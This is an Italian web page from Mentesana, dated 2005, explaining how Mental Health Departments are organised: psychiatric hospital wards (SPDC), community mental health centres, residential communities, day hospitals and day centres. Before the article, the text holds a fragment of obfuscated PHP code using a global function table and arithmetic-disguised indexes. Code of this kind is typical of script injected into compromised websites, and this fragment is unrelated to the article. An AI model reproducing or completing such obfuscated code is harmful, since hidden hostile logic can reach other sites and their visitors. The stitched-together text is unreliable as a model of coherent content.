=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) Le strutture per la salute mentale

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.
Le strutture per la salute mentale PDF 

9 dicembre 2005 - Mentesana

 

Presso ogni ASL è attivo il Dipartimento di Salute Mentale (DSM); questo dipartimento è articolato nelle seguenti strutture:

  • il Servizio Psichiatrico di Diagnosi e Cura (SPDC)
  • il Centro di Salute Mentale (CSM)
  • le Strutture Residenziali
  • le Strutture Semiresidenziali

 

Il Servizio Psichiatrico di Diagnosi e Cura

I servizi SPDC sono reparti ospedalieri con funzioni di primo intervento in cui vengono effettuati trattamenti sanitari in condizioni di degenza volontaria e/o obbligatoria. Forniscono consulenza psichiatrica ai servizi di pronto soccorso ed ai vari reparti ospedalieri. Per garantire la continuità terapeutica degli interventi il personale dei DSM viene impegnato sia nelle attività del territorio sia in quelle degli SPDC. La degenza negli SPDC è limitata nel tempo e, qualora si rendesse necessario un suo prolungamento per ragioni di urgenza sanitaria e/o di sicurezza per il malato e per gli altri, dovrebbe essere parte di un progetto terapeutico più ampio, che coinvolga i Centri di Salute Mentale, la famiglia e le strutture residenziali.

Il Centro di Salute Mentale

Le funzioni dei CSM sono molteplici: coordinamento dell'attività sul territorio; funzioni di tipo sociale e sanitario; programmi di assistenza sanitaria e socio-sanitaria. Tra i suoi compiti più importanti ci sono dunque la presa in carico della persona sofferente psichica nel suo luogo di vita abituale, cercando di cogliere la complessità degli aspetti psicologici, sociali e biologici alla base della situazione di disagio psichico, anche mediante l’utilizzo di equipe multidisciplinari.

Le Strutture Residenziali

Queste strutture ospitano, per periodi medio-lunghi, utenti in trattamento riabilitativo che necessitano della presenza degli operatori della salute mentale sia per l’osservazione che per lo svolgimento delle attività di vita quotidiana. Devono essere collocate in contesti urbani accessibili, mantenersi in collegamento con la rete dei servizi socio-sanitari del territorio, devono essere di piccole dimensioni (per favorire la comunicazione). Le strutture residenziali possono essere di tre tipi:

Comunità terapeutico-riabilitative (CTR)

Ospitano utenti con problemi rilevanti, anche a carico della rete familiare e sociale di supporto, con un'elevata riduzione dei livelli di autonomia. L'equipe degli operatori, di tipo multidisciplinare, è presente sulle 24 ore.

Comunità Alloggio

Ospitano utenti con un certo livello di autonomia ed in esse vengono attuati progetti socio-riabilitativi. La presenza degli operatori è in genere garantita per 12 ore.

Gruppi Appartamento

Ospitano utenti con un certo livello di autonomia che necessitano di un sostegno nelle attività della vita quotidiana e comunitaria. Si prevede un grado di protezione variabile, in relazione ai bisogni delle specifiche unità di convivenza. Vengono promosse attività di risocializzazione. Vi opera personale del DSM e/o della cooperazione sociale seguendo apposite convenzioni. Le Comunità Alloggio e i Gruppi Appartamento vengono definiti anche Comunità di Convivenza (CodiCo).

Le Strutture Semiresidenziali

Prevedono interventi di tipo diurno per l'attuazione di programmi terapeutico-socio-riabilitativi. Ne esistono due tipi:

Day Hospital

Si attuano interventi diagnositici e terapeutico-riabilitativi a breve e medio termine, programmati dal Centro di Salute Mentale al fine di evitare il ricovero a tempo pieno degli utenti. Può essere collocato all'interno dell’ospedale, in collegamento gestionale e funzionale con il SPDC o presso strutture esterne, in collegamento gestionale e funzionale con il CSM.

Centri Diurni

Svolgono prevalentemente attività di tipo socio-sanitario rivolta ad utenti che incontrano grosse difficoltà nello stabilire rapporti interpersonali e sociali. Le attività, concepite nell’ottica di un inserimento nei contesti esterni, cercano di favorire l'incontro e lo scambio tra soggetti diversi: operatori, utenti, familiari, associazioni di cittadini, cooperative sociali, etc. Secondo la tipologia delle attività si differenziano due tipi di Centri Diurni Socio-sanitari:

  1. Centri Diurni di tipo A (gestiti in collaborazione con Cooperative Sociali di tipo B, che includono cioè per almeno il 30 % soci appartenenti alle categorie svantaggiate, nel caso specifico sofferenti psichici). Le attività realizzate in questi centri sono mirate al recupero delle abilità della persona, cercando di incrementare la sua autonomia attraverso l'acquisizione di competenze professionali propedeutiche ad un effettivo inserimento socio-lavorativo.
  2. Centri Diurni di tipo B (gestiti in collaborazione con Cooperative Sociali di assistenza, ovvero tipo A ). Vi si realizzano attività espressivo-riabilitative e socializzanti con l'obiettivo di stimolare la motivazione a partecipare e di costruire rapporti all'interno del gruppo.

 

Organizzazione dei Dipartimenti di Salute Mentale in Italia (a cura del Ministero della Salute)


 

 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito